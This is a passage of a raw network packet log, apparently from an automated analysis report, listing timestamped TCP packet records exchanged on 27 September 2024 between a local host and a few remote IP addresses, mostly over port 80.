                                                                          Sep 27, 2024 04:21:18.198730946 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.198781967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.198920012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.198931932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.198946953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.198957920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.198976040 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.198996067 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.199002981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.199007034 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.199016094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.199028015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.199049950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.199049950 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.199079037 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.199103117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.199186087 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.224597931 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.224626064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.224637985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.224644899 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.224652052 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.224666119 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.224679947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.224694014 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.224699974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.224700928 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.224745989 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.224745989 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227365971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227381945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227402925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227421999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227431059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227431059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227437019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227449894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227458000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227458000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227471113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227483034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227488995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227488995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227494955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227508068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227516890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227516890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227523088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227535009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227547884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227554083 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227554083 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227560043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227577925 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227577925 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227634907 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227765083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227848053 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227858067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227869987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227881908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227894068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227899075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227899075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227906942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227917910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.227955103 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.227955103 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247189045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247206926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247217894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247231960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247242928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247256041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247267008 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247267008 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247270107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247332096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247344971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247363091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247370005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247374058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247402906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247402906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247404099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247417927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247428894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247437954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247437954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247443914 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247457981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.247467041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247467041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247498035 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.247498035 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.259949923 CEST455804971965.21.18.51192.168.2.5
                                                                          Sep 27, 2024 04:21:18.285942078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.285959005 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.285970926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.285981894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.285993099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286003113 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286015987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286051989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286056995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.286056995 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.286065102 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286173105 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286189079 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286201954 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286211967 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286223888 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286235094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.286257029 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.286257029 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.286257029 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.286257029 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.286257029 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.286292076 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.287755013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287787914 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287797928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287834883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287846088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287853956 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.287853956 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.287858009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287872076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287884951 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.287902117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.287921906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.287921906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.287944078 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.287956953 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288002968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.288079023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288089991 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288100004 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288117886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288117886 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.288130045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288142920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288144112 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.288144112 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.288156986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.288157940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.288186073 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.288186073 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.288250923 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.289740086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289768934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289779902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289803028 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.289843082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289854050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289865017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289877892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289890051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.289890051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.289921999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.289921999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.289952993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289963007 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289973021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289983988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.289993048 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290005922 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290007114 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290007114 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290021896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290031910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290031910 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290036917 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290060997 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290060997 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290288925 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290673018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290683985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290695906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290724993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290730000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290730000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290735960 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290767908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290770054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290770054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290803909 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290816069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290826082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290838957 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290838957 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290863991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290863991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290908098 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290925980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290937901 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290949106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.290988922 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290988922 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.290993929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291048050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291059017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291069031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291096926 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291096926 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291131020 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291142941 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291161060 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291166067 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291166067 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291171074 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291177034 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291182995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291189909 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291204929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291215897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291228056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291232109 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291266918 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291393042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291404009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291414022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291470051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291481018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291492939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291503906 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291518927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291518927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291553020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291553020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.291564941 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291575909 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.291788101 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.301796913 CEST4971945580192.168.2.565.21.18.51
                                                                          Sep 27, 2024 04:21:18.317111015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.317148924 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.317162991 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.317167044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.317179918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.317190886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.317203999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.317203999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.317203999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.317214966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.317270041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.317270041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319657087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319688082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319698095 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319720030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319721937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319721937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319731951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319744110 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319753885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319753885 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319756031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319782019 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319782019 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319813013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319823980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319843054 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319854021 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319854975 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319854975 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319864988 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319875002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319885969 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319917917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.319937944 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319948912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319960117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319968939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.319978952 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.320167065 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.320373058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.320450068 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.320462942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.320494890 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.320506096 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.320513964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.320513964 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.320519924 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.320533991 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.320559978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.320559978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.320583105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339725971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339760065 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339771032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339780092 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339783907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339796066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339798927 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339808941 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339819908 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339860916 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339867115 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339867115 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339871883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339884043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339895010 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339904070 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339915037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339931965 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339931965 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339945078 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339955091 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339967012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.339977026 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.339977026 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.340063095 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.373723984 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:18.374033928 CEST4972680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:18.379077911 CEST8049721185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379170895 CEST4972180192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:18.379246950 CEST8049726185.215.113.26192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379312038 CEST4972680192.168.2.5185.215.113.26
                                                                          Sep 27, 2024 04:21:18.379328966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379400969 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379410982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379421949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379440069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379443884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.379455090 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.379491091 CEST8049725185.215.113.117192.168.2.5
